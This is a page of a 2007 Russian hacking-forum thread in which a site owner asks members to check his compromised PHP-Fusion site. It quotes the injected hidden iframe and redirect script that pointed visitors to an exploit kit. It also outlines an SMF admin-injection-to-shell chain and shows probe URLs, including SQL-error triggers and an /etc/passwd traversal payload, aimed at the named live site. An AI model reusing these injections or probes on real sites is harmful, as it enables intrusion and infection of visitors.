ANTICHAT - Проерте сайт плиз)

Страница 2 из 3

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Проерте сайт плиз) (https://forum.antichat.xyz/showthread.php?t=52230)

Фещ	31.10.2007 07:59

Цитата:

Сообщение от nbd

А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек :) Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа :) А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (:

ссылку на сплоит плиз :)

AlexALX

31.10.2007 11:47

Цитата:

Сообщение от nbd

Нету логов... :( Форум то можно хакнуть тогда, только у меня была IPB но она была паленая, и на хосте забанили мой форум, пришлось SMF ставить... н оя в ней пока вообще не раздуплился да и както пашет - пусть пашет... прос токакойто двиг после IPB туповатый...

nbd	02.11.2007 09:29

Цитата:

Сообщение от Фещ

ссылку на сплоит плиз :)

http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:

spyke

02.11.2007 13:52

Цитата:

Сообщение от nbd

http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:

у меня ссылу не открыл :)

AlexALX

02.11.2007 22:44

По информации от хакера, как я получил, и...

В общем, сайт хакнул не по локали. Где то в скрипте есть дырка, какая и где я незнаю, но php-fusion.int.ru хакнут щас также как и мой сайт (ВНИМАНИЕ! НА САЙТЕ ВИРУС В IFLAME!)

В общем, вот как меня хакнули:

Создана новая панель:

Код:

echo("<iframe width='0' height='0' scrolling='no' noresize src='http://novor.info/iframe.php'>");

В этом файле:

Код:

<script>document.location.replace("http://58.65.234.105/cgi-bin/nsp15/in.cgi?p=spuser");</script>

А дальше сам эксплоит. По той ссылке IE получает эксплоит и вирус, а остальные браузеры -- просто редирект на google.com.

Фещ	02.11.2007 22:46

Цитата:

Сообщение от spyke

у меня ссылу не открыл :)

Forbidden
You don't have permission to access /showthread.php on this server

wtf?

AlexALX

02.11.2007 23:51

http://www.php-fusion.co.uk/forum/viewthread.php?forum_id=38&thread_id=18898

перевёт как мог на англ и задал вопрос на офф сайте движка.

halkfild

11.11.2007 17:38

[pasкрытие путей]

Цитата:

http://alexalx-soft.com/infusions/pro_download_panel/download.php?catid[]=63

/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php

Цитата:

http://alexalx-soft.com/infusions/shoutbox_panel/shoutbox_archive.php?rowstart=28888888888888888888 8888

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3

Scipio

14.11.2007 04:39

Цитата:

file_exists() [function.file-exists]: open_basedir restriction in effect. File(themes/../../../../../../../../../../../etc/passwd%00/theme.php) is not within the allowed path(s): (/home/vshosts/hosts/u5034/alexalx-soft.com/:/usr/home/vshosts/hosts/u5034/alexalx-soft.com/:/virtual/vshosts/hosts/u5034/alexalx-soft.com/) in /usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php on line 196

несовсем понял возможен ли инклюд локальный (чет не до ковыряния сейчас, сплю почти) но раскрытие путей опять же, в пост-переменной user_theme при редактировании профиля (edit_profile.php)

AlexALX

23.11.2007 16:23

Цитата:

Сообщение от halkfild

[pasкрытие путей]

/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3

Такс... Щас посмотрю что там... Спс...

Время: 03:11

Страница 2 из 3

Показывать 40 сообщений этой темы на одной странице